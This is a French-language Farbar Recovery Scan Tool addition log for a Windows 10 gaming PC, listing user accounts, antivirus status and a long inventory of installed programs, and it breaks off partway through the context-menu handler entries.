Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 02.01.2018 Exécuté par Truff (09-01-2018 19:01:37) Exécuté depuis C:\Users\Truff\Desktop Windows 10 Home Version 1709 16299.125 (X64) (2017-12-21 21:17:06) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-1552058139-121831200-1710227419-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1552058139-121831200-1710227419-503 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1552058139-121831200-1710227419-1004 - Limited - Enabled) Invité (S-1-5-21-1552058139-121831200-1710227419-501 - Limited - Disabled) Truff (S-1-5-21-1552058139-121831200-1710227419-1002 - Administrator - Enabled) => C:\Users\Truff WDAGUtilityAccount (S-1-5-21-1552058139-121831200-1710227419-504 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Avira Antivirus (Enabled - Up to date) {B3F630BD-538D-1B4A-14FA-14B63235278F} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Avira Antivirus (Enabled - Up to date) {0897D159-75B7-14C4-2E4A-2FC449B26D32} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) „Windows Live Essentials“ (HKLM-x32\...\{2329E182-DFC8-4C1E-AF2C-758F25347F69}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Apple Application Support (32 bits) (HKLM-x32\...\{BC7C46A4-D7A7-48EC-A98C-32A7762B5EFA}) (Version: 6.2.1 - Apple Inc.) Apple Application Support (64 bits) (HKLM\...\{F0C4B709-8BF4-4A72-B527-12E7BF5482F8}) (Version: 6.2.1 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{BD6778C5-6FA5-492A-ADD6-E706339C2A7B}) (Version: 11.0.2.4 - Apple Inc.) Apple Software Update (HKLM-x32\...\{C1BBFD2A-BCDD-45B3-8C0B-66BD434970A8}) (Version: 2.4.8.1 - Apple Inc.) ASUS ROG Gaming Mouse GX850 (HKLM-x32\...\{1B23161E-7667-4EC8-ADE1-CCE45A0209D7}) (Version: 2.00.018 - ASUS) Avira (HKLM-x32\...\{4BC30143-FC17-4BA0-96C3-11F21F026099}) (Version: 1.2.100.18354 - Avira Operations GmbH & Co. KG) Hidden Avira (HKLM-x32\...\{638c58eb-e71e-4b96-8f16-c5a7dbc4293f}) (Version: 1.2.100.18354 - Avira Operations GmbH & Co. KG) Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.34.17 - Avira Operations GmbH & Co. KG) Avira Software Updater (HKLM-x32\...\{591FD32E-4D97-44D6-84E5-84751E7A9859}) (Version: 2.0.4.31895 - Avira Operations GmbH & Co. KG) Battery Calibration (HKLM-x32\...\{619FA785-489B-4D22-911F-82D6EDF5BDB0}) (Version: 1.0.1208.0301 - Micro-Star International Co., Ltd.) Battlefield™ 1 (HKLM-x32\...\{335B50BC-6130-4BAF-9A6A-F1561270587B}) (Version: 1.0.47.30570 - Electronic Arts) BisonCam (HKLM-x32\...\{4A57592C-FF92-4083-97A9-92783BD5AFB4}) (Version: - ) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Boot Configure (HKLM\...\{F02936BF-A5EA-4D46-8FE7-EDA999D2BB54}) (Version: 10.014.01103 - Application) BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 4.0.1309.301 - ) CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5509.52 - CyberLink Corp.) D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd) DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd) Dragon Gaming Center (HKLM-x32\...\{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1401.2301 - Application) Hidden Dragon Gaming Center (HKLM-x32\...\InstallShield_{965B16C7-0778-4C45-B7D1-83A59E6FBBCB}) (Version: 1.0.1401.2301 - Application) DriversCloud.com (64 bits) (HKLM\...\{D3536C71-00CD-457F-8624-CBD51FD43F1C}) (Version: 10.0.2.0 - Cybelsoft) Fotoattēlu galerija (HKLM-x32\...\{97368584-CA0D-45C6-8151-AE96A33A867B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogaléria (HKLM-x32\...\{9093B0D5-EA59-4C9E-A2E3-CC130138DFCD}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalerie (HKLM-x32\...\{3CBD94C1-BA15-488C-888B-D8DD296CC6DC}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalerie (HKLM-x32\...\{A1FBD2B3-6768-472D-BA46-C00EACBCE16C}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalerii (HKLM-x32\...\{ACE848B7-145C-4230-9B95-BA9C98A51AA6}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalerija (HKLM-x32\...\{1F0C818D-4A41-4E40-BAFB-BB940C82A518}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalerija (HKLM-x32\...\{6D9DD7D9-4167-4541-8DA8-619B9B802D72}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Foto-galerija (HKLM-x32\...\{CB5CC924-4B5C-4682-BB21-F160C12F56AB}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalleri (HKLM-x32\...\{E354D495-5DA4-4CCF-AB39-080F6A4141BE}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotogalleriet (HKLM-x32\...\{9F470E17-4FC3-4091-A508-D5347A16A2B9}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotoğraf Galerisi (HKLM-x32\...\{DB7B6508-2AAB-4F26-99D4-74559A2F5E42}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Fotótár (HKLM-x32\...\{E50E3DBC-46AA-4827-B2A6-F995D81DF526}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galeria de Fotografias (HKLM-x32\...\{F5E338CE-E1C6-4F7D-8300-44DBD05B9F14}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galería de fotos (HKLM-x32\...\{8F7FECEC-088F-431D-A5FB-2B59E1E69943}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galeria de Fotos (HKLM-x32\...\{F5248B7E-779A-4FA4-8134-D1933D8680FA}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galeria fotografii (HKLM-x32\...\{7595CAD2-87D0-4D01-AC02-3FDD3A891BB8}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galerie de photos (HKLM-x32\...\{446CC8CE-0E90-44F7-ADD0-774B243EF090}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galerie foto (HKLM-x32\...\{C2F1EBBF-9AC4-4E0B-A7F4-74C9C7AD4813}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Galerija fotografija (HKLM-x32\...\{C5B383EB-B85B-481C-9946-34FBF021678B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 63.0.3239.132 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden GoPro Studio (HKLM-x32\...\{C8312DB0-7002-4F37-95B7-836DF2227EE8}) (Version: 5.10.4944 - GoPro, Inc.) Hidden Grim Dawn (1.0.0.9) (HKLM-x32\...\1449651388_is1) (Version: 0.1.1.310 - GOG.com) Grim Dawn: Crucible (1.0.0.9) (HKLM-x32\...\1812959072_is1) (Version: 0.1.1.310 - GOG.com) Grim Dawn: Loyalist Upgrade (1.0.0.9) (HKLM-x32\...\1551979801_is1) (Version: 0.1.1.310 - GOG.com) HP Support Assistant (HKLM-x32\...\{4780AF24-213D-4187-86F2-0014A6D6077B}) (Version: 8.5.37.19 - HP Inc.) HP Support Solutions Framework (HKLM-x32\...\{B11FEAD6-F19E-473E-A8B1-AE58C058F575}) (Version: 12.8.47.1 - HP Inc.) HP Touchpoint Analytics Client (HKLM\...\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}) (Version: 4.0.2.1439 - HP Inc.) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4835 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.9.0.1001 - Intel Corporation) Intel(R) Update Manager (HKLM-x32\...\{7224B7CE-196C-4E2A-A1AE-1D7BF259FD36}) (Version: 3.4.1942 - Intel Corporation) iTunes (HKLM\...\{F3D76007-5A86-4D79-AFF5-103760F02B60}) (Version: 12.7.2.60 - Apple Inc.) Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation) Just Cause 3 (HKLM-x32\...\{513624C8-A6E3-44FA-A449-5C2BDAA72CC4}_is1) (Version: - Avalanche Studios) KB9X Radio Switch Driver (HKLM\...\5AADE1068CF70DD983F763B20CF2CAAB72883915) (Version: 1.1.0.0 - ENE TECHNOLOGY INC.) KLM (HKLM-x32\...\{4DEA5B85-6C56-45F3-AE00-FED756B0D3B4}) (Version: 1.0.1403.2801 - Application) Hidden KLM (HKLM-x32\...\InstallShield_{4DEA5B85-6C56-45F3-AE00-FED756B0D3B4}) (Version: 1.0.1403.2801 - Application) Launcher GFACE (HKLM-x32\...\{28D1723C-31C4-4A83-9799-DFFB3739026D}) (Version: 1.0.0 - Crytek GmbH) MAGIX MX Suite (HKLM\...\{43136332-880B-458A-966C-900C18752B66}) (Version: 1.13.0.121 - MAGIX AG) Hidden MAGIX MX Suite (HKLM-x32\...\MAGIX_{43136332-880B-458A-966C-900C18752B66}) (Version: 1.13.0.121 - MAGIX AG) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Office Professionnel Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{f9b04b37-35d5-4a19-a51b-fcf4a8734851}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{3bcf8c72-b231-4d28-9f39-3405c22d8b5a}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation) Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation) Mises à jour NVIDIA 29.1.0.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 29.1.0.0 - NVIDIA Corporation) Hidden Module linguistique Microsoft Visual Studio 2010 Tools pour Office Runtime (x64) - FRA (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - FRA) (Version: 10.0.50903 - Microsoft Corporation) Movie Maker (HKLM-x32\...\{000AD938-EEBB-46F5-BD33-23CB34A57C54}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{03CC9D58-B132-4CC0-A521-4F3660AA43C7}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{058EDEC8-1873-4B49-9A08-54ADE9CC129B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{13F3CEA5-9E2C-4C4E-9F0F-D0DB389CF4A9}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{144113A4-1A98-452F-8506-60F8C811D316}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{1532CEFF-ADB4-4230-BF03-30A6B3182663}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{2A078A2B-E2C8-43A3-862C-DC57090AB7C2}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{2AC4C6D7-512D-4B78-A85B-2C16E748AB8E}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{306C7AEF-16C7-428D-93AA-99D4A4090243}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{36BEC461-B58A-414D-993E-E2BDD1F1A14B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{46A648D2-C097-41A3-A517-E709F045B6CD}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{62BBCDDC-4979-4E59-9D97-5B8E874C3191}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{63B1E33F-F243-4656-A600-125D6963B43A}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{701FE1BC-834A-4857-AF62-6EBA50CFBC78}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{719E4DA1-A17B-4B46-9D5D-925D4FBE4D69}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{751EB657-3F22-4150-8CE4-D79A262F1D92}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{7E63F102-A9E9-4F4C-8004-BC62974736BF}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{8176B9CA-F037-49C0-BD77-661B1DDCA6F3}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{862780DF-67D4-40B4-BDC7-E82B3F116504}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{9EDF46F0-2D4E-4C00-B2B6-0660666E9F60}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{A035950F-15BA-41C0-9D8F-165FC0536012}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{A17946CA-18E5-4CF0-8D55-A56D804718F8}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{A47EA9D4-BB87-415E-9239-28860434E5A0}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{AE8044B5-FCA3-4EBE-AC78-0FB3A6E8DC76}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{BAD4B8FA-4BDA-4A59-BE64-9741031680C7}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{BFA6D5AD-25EA-475F-AD80-ECD408C674AB}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{C32D87E1-6310-4CD5-8D6D-865AFE0E9B4E}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{CD239A50-AD95-4A72-9D5F-D4FBD4B89417}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden MSI Social Media Collection (HKLM-x32\...\{F7B87051-7BE9-43EB-8C30-599FA611E748}) (Version: 1.13.1151 - MSI) My.com Game Center (HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\MyComGames) (Version: 3.202 - My.com B.V.) NVIDIA GeForce Experience 3.10.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.10.0.95 - NVIDIA Corporation) NVIDIA Logiciel système PhysX 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation) NVIDIA Pilote 3D Vision 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.71 - NVIDIA Corporation) NVIDIA Pilote audio HD : 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation) NVIDIA Pilote graphique 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.71 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.8730.2165 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.8730.2165 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-040C-1000-0000000FF1CE}) (Version: 16.0.8730.2165 - Microsoft Corporation) Hidden OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Panneau de configuration NVIDIA 388.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 388.71 - NVIDIA Corporation) Hidden PDF Architect 4 (HKLM-x32\...\PDF Architect 4) (Version: 4.0.34.26215 - pdfforge GmbH) PDF Architect 4 Create Module (HKLM\...\{72B9DF2C-76FA-40B5-A469-16EAB159CE72}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden PDF Architect 4 Edit Module (HKLM\...\{BDF7326B-7ED4-4034-B867-F4E88D4E628B}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden PDF Architect 4 View Module (HKLM\...\{03E04B47-9270-4613-8D7E-DA4AD2B259A0}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.3.2 - pdfforge GmbH) Podstawowe programy Windows Live (HKLM-x32\...\{A7E73DE5-E5FD-4923-9D88-E09ECD1F3545}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{9CD6F9C3-1D1A-4A62-880E-74FE7726CF75}) (Version: 1.1.38.1037 - Qualcomm Atheros) Hidden Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.312 - Qualcomm Atheros Communications) Hidden Qualcomm Atheros Killer E220x Drivers (HKLM\...\{0B421602-CBC4-4375-B816-9D8CD81DC698}) (Version: 1.1.38.1037 - Qualcomm Atheros) Hidden Qualcomm Atheros Killer Wireless-N Drivers (HKLM\...\{952422A4-546D-4A2B-87B7-0E31B67BA636}) (Version: 1.1.38.1037 - Qualcomm Atheros) Hidden Qualcomm Atheros Network Manager (HKLM\...\{FF3BFE8F-D4B5-428A-9E62-464DCA7EBCFF}) (Version: 1.1.38.1037 - Qualcomm Atheros) Hidden Qualcomm Atheros Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.38.1037 - Qualcomm Atheros) Quik (HKLM\...\{2B17EF27-5A63-4499-8410-B7D5CFF3FAB4}) (Version: 0.1.4944 - GoPro, Inc.) Hidden Quik (HKLM-x32\...\{50b3f174-39f4-4599-a8dc-e66fc4e3540e}) (Version: 2.2.0.4944 - GoPro, Inc.) Raccolta foto (HKLM-x32\...\{D04EBB49-C985-4A38-8695-62000861293A}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.370.102 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.) SCM (HKLM\...\{6692DCAF-A445-4C6B-AF31-3DD85FC06FBA}) (Version: 13.014.01026 - Application) Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft) Skype Entreprise Basic 2016 - fr-fr (HKLM\...\SkypeforBusinessEntryRetail - fr-fr) (Version: 16.0.8730.2165 - Microsoft Corporation) Skype Meetings App (HKLM-x32\...\{D194F3F7-A3E3-4D33-97D6-A37725DAEC25}) (Version: 16.2.0.172 - Microsoft Corporation) Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.) Sound Blaster Cinema (HKLM-x32\...\{8801CA65-921A-4CCC-9D63-879D1D0BAA97}) (Version: 1.00.05 - Creative Technology Limited) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) SteelSeries Engine (HKLM\...\SteelSeries Engine) (Version: 2.8.417.28061 - SteelSeries) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.6.1 - Synaptics Incorporated) System Requirements Lab (HKLM-x32\...\{B35DBBD7-B42E-494A-8913-431A2E448131}) (Version: 6.1.1.0 - Husdawg, LLC) TomTom HOME (HKLM-x32\...\{BB05590A-6602-43F3-A400-77EA0976BC0A}) (Version: 2.9.8 - Nom de votre société) TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{DE083343-D24D-4495-919E-18C65EC0F289}) (Version: 2.8.0.0 - Microsoft Corporation) Valokuvavalikoima (HKLM-x32\...\{C32F4F5A-C9FB-427C-9F6F-9DB157611FFF}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden VFW_Codec32 (HKLM-x32\...\{08AA47F1-1469-430F-9163-6F11D58E1AA0}) (Version: 0.1.160.0 - GoPro, Inc.) Hidden VFW_Codec64 (HKLM\...\{B9AE41FE-4730-4C52-8C77-442CD6F142B6}) (Version: 0.1.160.0 - GoPro, Inc.) Hidden VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN) Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden Warface My.Com (HKU\S-1-5-21-1552058139-121831200-1710227419-1002\...\Warface My.Com) (Version: 1.54 - My.com B.V.) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation) WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) XSplit Gamecaster (HKLM-x32\...\{192BAAFE-0440-45C5-8E9C-FA6F8581EC8F}) (Version: 1.5.1401.2102 - SplitMediaLabs) Συλλογή φωτογραφιών (HKLM-x32\...\{A19A8C25-272A-4CD6-8BA8-3772321A021B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Основи Windows Live (HKLM-x32\...\{9038E0C6-9CB9-4380-8FA3-B6B30FA304CF}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Основные компоненты Windows Live (HKLM-x32\...\{F7304CCF-B4A0-49C7-88A8-CD3F28FFBF9A}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Фотоальбом (HKLM-x32\...\{087D261B-73AE-4B8A-8F18-2EE80DD2ED8B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Фотогалерия (HKLM-x32\...\{32AA7594-09A9-437F-9541-5F760509B752}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Фотографии (общедоступная версия) (HKLM-x32\...\{2B068A64-F867-44E9-8827-A795647C8730}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden Фотоколекція (HKLM-x32\...\{115356B4-8E81-43DB-BB2A-19E5ED95FBAF}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden גלריית התמונות (HKLM-x32\...\{E37CD6E8-BC51-4D48-9840-803EC3B418D3}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) CustomCLSID: HKU\S-1-5-21-1552058139-121831200-1710227419-1002_Classes\CLSID\{3E3AD4BD-346A-460A-80E8-90699B75C00B}\InprocServer32 -> C:\Users\Truff\AppData\Local\Microsoft\SkypeForBusinessPlugin\16.2.0.172\GatewayActiveX-x64.dll (Microsoft Corporation) ContextMenuHandlers1: [PDFArchitect4_ManagerExt] -> {3AECFCB3-8472-48E9-BC7B-5A3CD945C886} => C:\Program Files\PDF Architect 4\creator-context-menu.dll [2016-08-05] (pdfforge GmbH) ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Windows\system32\mscoree.dll [2017-09-29] (Microsoft Corporation) ContextMenuHandlers1: [Shell Extension for Malware scanning] -> 